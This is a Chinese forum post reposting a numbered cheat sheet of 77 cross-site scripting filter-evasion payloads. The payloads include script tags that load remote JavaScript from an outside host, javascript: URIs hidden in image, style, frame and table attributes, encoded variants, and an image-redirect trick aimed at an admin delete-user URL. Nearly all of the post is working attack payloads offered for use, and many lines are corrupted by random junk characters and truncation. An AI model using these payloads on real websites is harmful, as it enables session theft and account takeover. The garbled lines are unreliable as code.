貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。- o$ x, P% e% n0 j
(1)普通的XSS JavaScript注入0 A: i6 @- `* W0 P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. C( z6 s7 w4 Y8 P
(2)IMG标签XSS使用JavaScript命令
/ L4 R- }- E& D$ o2 J<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; b9 {& n' ^# K/ z. e6 N(3)IMG标签无分号无引号" y; P8 N' B8 ^0 I. I1 h- Q
<IMG SRC=javascript:alert(‘XSS’)>) p" n- X. z3 _$ Y
(4)IMG标签大小写不敏感, x& r- R. g! @
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>& E5 n0 l% t- b% r3 q" r
(5)HTML编码(必须有分号)# H( w' \9 W% ?& m/ |+ V
<IMG SRC=javascript:alert(“XSS”)>
0 O. C# z( F* V5 ~(6)修正缺陷IMG标签! g4 f/ q0 R* L+ u
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>9 U4 z) t1 p/ ^ V7 F/ k; ]+ F0 m
( \5 f( l3 M9 I2 v' o
s$ E9 U% D' U2 ]
(7)formCharCode标签(计算器)
* t7 Q, Y: k, O5 R" z# Q<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 o+ u# X2 W# |* v( A. R: m(8)UTF-8的Unicode编码(计算器)4 ?1 d& E2 j4 n
<IMG SRC=jav..省略..S')>2 w5 p: s, f& O1 K, H+ L. `
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)$ }0 l; ^, y$ I4 h2 r D# { Z
<IMG SRC=jav..省略..S')>
- w/ z1 \: ~0 p9 i$ A+ w' o(10)十六进制编码也是没有分号(计算器)4 v% R8 K! r; B/ U
<IMG SRC=java..省略..XSS')>
2 P6 m2 C8 u7 k0 }(11)嵌入式标签,将Javascript分开7 o! `: `& b- k1 w" B+ E
<IMG SRC=”jav ascript:alert(‘XSS’);”>% b0 d2 n7 y; s. c' n
(12)嵌入式编码标签,将Javascript分开
0 N4 @0 t4 S" d/ b( i<IMG SRC=”jav ascript:alert(‘XSS’);”>( Y- f9 m1 ]( g7 @
(13)嵌入式换行符
0 O$ H6 N' \2 w% ]( e3 u<IMG SRC=”jav ascript:alert(‘XSS’);”>6 z1 i% Y. p8 K7 o6 L. h
(14)嵌入式回车; U% H$ P; Y" `4 `. m7 e
<IMG SRC=”jav ascript:alert(‘XSS’);”>' C0 o+ Q, C" ^
(15)嵌入式多行注入JavaScript,这是XSS极端的例子, e8 r% l8 l' W: g( G
<IMG SRC=”javascript:alert(‘XSS‘)”>6 X# b2 {1 v/ M; V x# }1 O! s$ [
(16)解决限制字符(要求同页面)% d( a* r+ g; X# j
<script>z=’document.’</script>
) X: I1 j% w4 y7 [<script>z=z+’write(“‘</script>
; d4 b; k- }1 Y% V% A) y- ?<script>z=z+’<script’</script>
: L( k: ~3 \( O5 W8 y<script>z=z+’ src=ht’</script>
: P5 j& k R* L' N G7 M# L<script>z=z+’tp://ww’</script>
3 t. e$ m$ d+ R2 R: j6 A<script>z=z+’w.shell’</script>
. n% }( ~, @+ o' {$ s<script>z=z+’.net/1.’</script>: C9 x# ]: g: p1 @% f9 l8 c
<script>z=z+’js></sc’</script># M" b% [; J+ r/ A: W; D
<script>z=z+’ript>”)’</script>
$ l* w. C0 |' X% n<script>eval_r(z)</script>8 [0 U' Y$ T4 O& M( N
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
4 l% Z _; a; B, C' Q2 yhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6! h- H" E- y9 N3 T* p- W, \
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out! }9 U4 K( F B1 P: D# r7 h( F* n
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
: h* ^/ E; x# v3 N' Eperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out5 `; z% v' y1 r t: t/ M- L# v
(19)Spaces和meta前的IMG标签
* F+ o& K; M9 G6 A' {5 G: {! a1 b<IMG SRC=” javascript:alert(‘XSS’);”>+ r7 x1 [7 P# K( o3 L' y1 G
(20)Non-alpha-non-digit XSS
5 h; s' o N, m" B/ _4 x) b4 r& T<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 ]9 e9 `! S8 X5 \, G3 U2 ~! j( r
(21)Non-alpha-non-digit XSS to 2; ?# a2 G5 Z& T9 |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
' g4 H0 x, Q% r$ K; y0 p" d(22)Non-alpha-non-digit XSS to 3! i7 A, P9 S1 C7 R- }1 w1 O* B) Y
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ Y. ~8 o: l3 D: I, a8 @8 n(23)双开括号
2 U; D7 }" m$ h0 f<<SCRIPT>alert(“XSS”);//<</SCRIPT>& f+ K$ D+ J$ p9 V9 J) \+ g5 b7 n
(24)无结束脚本标记(仅火狐等浏览器)
3 Y4 I8 _5 j( n5 q/ _$ s<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 @* E `* ^+ J7 a) \6 u/ Z
(25)无结束脚本标记2 y6 g" ^+ r0 r9 q% v. `
<SCRIPT SRC=//3w.org/XSS/xss.js>9 a9 F4 c2 L) |
(26)半开的HTML/JavaScript XSS
3 \$ I/ C+ O( S3 b<IMG SRC=”javascript:alert(‘XSS’)”
4 k# K5 ]* [1 e& d' E1 c(27)双开角括号
3 a) G2 J' e" z# Q3 M<iframe src=http://3w.org/XSS.html <' w# {6 O% o! e' C% {
(28)无单引号 双引号 分号
7 `3 \; z( V( P+ W<SCRIPT>a=/XSS/. Y& _& D- z/ U- l' w
alert(a.source)</SCRIPT>
$ b A) H8 M1 K) J& t(29)换码过滤的JavaScript9 M' R1 w7 o( V+ B: ?
\”;alert(‘XSS’);//0 k6 }. t2 e ?- g Q3 n
(30)结束Title标签
5 z/ {7 q8 N# `7 r# x3 [$ J3 \5 T</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 F9 L- e6 A- v0 n& W& m
(31)Input Image
# j3 U/ @" b+ V. d" Q* N<INPUT SRC=”javascript:alert(‘XSS’);”>
5 X) D8 j. D8 y3 _* N; U(32)BODY Image
# z' j" w- B. ?% W# W0 K$ w x' _<BODY BACKGROUND=”javascript:alert(‘XSS’)”>) v' T4 G) q8 ^; Z3 \3 F* w; r3 F! E' U
(33)BODY标签% m; E/ q3 l% o' @$ f# c+ w
<BODY(‘XSS’)>- A) e9 Y1 W+ n2 O. A
(34)IMG Dynsrc; o. _8 a b3 \: B- h
<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 O% X! L3 M" N
(35)IMG Lowsrc
& @+ s9 E+ z) t1 [' L<IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ M, b t$ b$ q(36)BGSOUND
1 {% J5 u7 @; h# }! r# E0 ]1 f<BGSOUND SRC=”javascript:alert(‘XSS’);”>
! c9 q8 e& P0 M# W; s- @9 ~(37)STYLE sheet8 R. Y) l1 g1 q( w# b' H f# k
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 j1 v: G' v, G(38)远程样式表
6 {$ D% T( _ w( \; Y7 D8 U<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ D+ Z4 z- [5 t/ i' o! q: s3 k
(39)List-style-image(列表式) u! y8 X3 v3 i) K ]9 J: ?- A
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
4 ]4 q( d0 O5 O1 y1 {- K(40)IMG VBscript
r7 }9 g4 [1 x4 ]<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
, E$ q- C: w& Y(41)META链接url: j7 ?6 h& h3 B/ Q0 H* |5 `4 B
, `3 ]) h8 E- H6 z% I% T2 P
: @- R* {/ o; ?. |" L4 N% Y) k9 ~) c
<META HTTP-EQUIV=”refresh” CONTENT=”0;
% g7 V5 r* C( @/ a! _$ Y, |URL=http://;URL=javascript:alert(‘XSS’);”>2 H k$ w H. g9 P- u
(42)Iframe: O! M; ]/ d( D& K+ [: L1 E4 i5 f+ X: V6 y
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>, \ e3 U9 m& a3 s
(43)Frame. {& s. ~4 J$ r8 x1 h p3 T' a) a7 O
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
: {7 N! _# r" Y z xhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
4 Y6 K3 y& U" t7 R% J! b(44)Table, D: Z! x6 W& P4 y+ F
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! U4 k" _9 e* j+ T(45)TD
& T. ` v4 h0 h: [8 g3 s<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
( w" K/ J) k. B(46)DIV background-image
2 ~1 }: n( w5 g: k<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ O3 ?$ v5 \, v(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-, [" o/ }- F, @; Q0 u. T6 T8 ~
8&13&12288&65279)
6 T; ^1 q- Z9 g+ k5 N+ X1 D<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 }' Z1 f* }4 {6 D, l9 |7 b9 D4 G
(48)DIV expression) U9 S/ v l- N ~5 W' [* y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>. F6 g* s* |- p* S
(49)STYLE属性分拆表达
" E1 [3 x5 |1 A( ?. f<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 i$ N7 O+ G& ^. ]( B(50)匿名STYLE(组成:开角号和一个字母开头)
( W, }3 Y7 Z7 a<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. E. {; H! i1 O4 U4 w8 J/ a(51)STYLE background-image
/ v. R+ ]5 Y+ P9 H<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
* a5 n. y& R5 w! |$ }CLASS=XSS></A>) P3 M2 @$ k0 V( j* P
(52)IMG STYLE方式
8 g. j2 b: f# @2 t& Nexppression(alert(“XSS”))’>9 b3 G8 i$ P [- _% f0 I
(53)STYLE background
) \4 h9 d- V! L$ B' K8 c<STYLE><STYLE
, L m; Z/ c5 Ttype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>( ?3 m" `% [) x5 |
(54)BASE) B( R, l% W7 j" j: W3 |$ @+ h
<BASE HREF=”javascript:alert(‘XSS’);//”>- l1 t& S! ~( h' G
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! Y! l# j# |* b5 x<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
' l1 N$ [5 M( p2 r( ^# k, \+ w9 B% J(56)在flash中使用ActionScrpt可以混进你XSS的代码) j9 ?* ?4 U- `
a=”get”;
6 w' m( m' U! S' g, ub=”URL(\”";
( }4 v& p2 V( x2 |c=”javascript:”;' K0 m1 d4 M1 M# @: `5 a
d=”alert(‘XSS’);\”)”;
& i3 [2 A& c9 y0 |eval_r(a+b+c+d);
) J" h$ x w0 c* Q' L0 E q o(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 o- I! h# p$ s* [, Q
<HTML xmlns:xss>
/ G; N8 v: |( J! V8 i0 K2 P<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>/ |( K9 }' n, Q; h4 _
<xss:xss>XSS</xss:xss>
/ }9 k$ _: b5 U! U! F</HTML>
$ {7 c; b" B' @(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. d% y) N3 j# A: B" J' @2 X: h8 x<SCRIPT SRC=””></SCRIPT>
5 {3 [2 c& k* V(59)IMG嵌入式命令,可执行任意命令6 ?8 l! E# v8 m" K. Q
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
" v8 l+ m, K' O% i7 c% d(60)IMG嵌入式命令(a.jpg在同服务器)2 j6 @1 y" o8 d
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* ]! |# `7 } F/ F5 g: o2 ^" V(61)绕符号过滤1 X( B1 u$ ^* v9 \
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 U0 @* U! `, x6 `) V# X(62)
* Q4 b- e9 X# h: R: ]! T<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 s7 c! _0 j6 z8 C, `' ?(63)
6 u' t* |& y& _1 `/ @<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
( Q* z: V+ h, u/ a(64) c( G! m; t5 T6 Z
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
8 d& W& t# j( w& R: d(65)
4 h8 |4 E4 Z' e& P+ Z) x* I, H<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ Y, E* Y( A! d& s) t(66)12-7-1 T00LS - Powered by Discuz! Board
; }* L- n; z8 i7 Phttps://www.t00ls.net/viewthread ... table&tid=15267 4/6 A" |. u# f) n, B
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ o) x' C, [0 T+ `( L; k* ? p(67)9 [+ f# x6 Z' B
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>0 t4 _( q9 v4 h% o* ?
</SCRIPT>
5 m5 r( F7 M2 i5 y3 F C$ J* u(68)URL绕行5 O( [4 R; F0 _" d! R5 E! L* a
<A HREF=”http://127.0.0.1/”>XSS</A>
! Q+ V9 o2 ]1 J8 e" [2 l) S(69)URL编码 h5 [ l7 { N2 e
<A HREF=”http://3w.org”>XSS</A>9 K0 _5 }/ V/ Q. Q" t! z- P4 Z" k
(70)IP十进制
" |! \ c9 ^1 e6 c8 [9 f<A HREF=”http://3232235521″>XSS</A>" ]+ i! T; T9 V0 i( l8 Z
(71)IP十六进制: U/ d/ z- Q7 u' F5 \
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>( F' L: ~7 |$ `4 |; H0 c, `" A- Z- I
(72)IP八进制
: z) ^8 R/ n# T, p* h% H<A HREF=”http://0300.0250.0000.0001″>XSS</A>5 r: Z8 D+ C3 o, P Y# _. J* H" ?
(73)混合编码
3 ?3 z+ f* y( j% q, m, b<A HREF=”h" x$ J/ T' _. b) M! F
tt p://6 6.000146.0×7.147/”">XSS</A>3 t9 e5 I' Z: Q: e
(74)节省[http:]
& F* e6 L* k: I$ R# v; W9 t9 i5 v<A HREF=”//www.google.com/”>XSS</A>9 Y v) \9 ~- }1 u3 }. @! N6 V7 z
(75)节省[www]6 j7 g2 p& L5 p x" n7 A, R; {
<A HREF=”http://google.com/”>XSS</A>
1 X) N0 b. }6 N9 `(76)绝对点绝对DNS
3 m( b) w0 O0 w<A HREF=”http://www.google.com./”>XSS</A>
( N7 u% z: l+ t2 O0 A(77)javascript链接
0 [6 A. p# A; o. t/ `+ a5 D<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
5 S( `; c% y+ z- g0 ?# k7 |" t8 O+ f: o' Z
原文地址:http://fuzzexp.org/u/0day/?p=14% G; }7 b: N1 {5 }* R! l
/ {1 C3 R. k7 V1 W) \( K7 ], E |
发表于 2013-4-19 19:22:37
收藏
支持
反对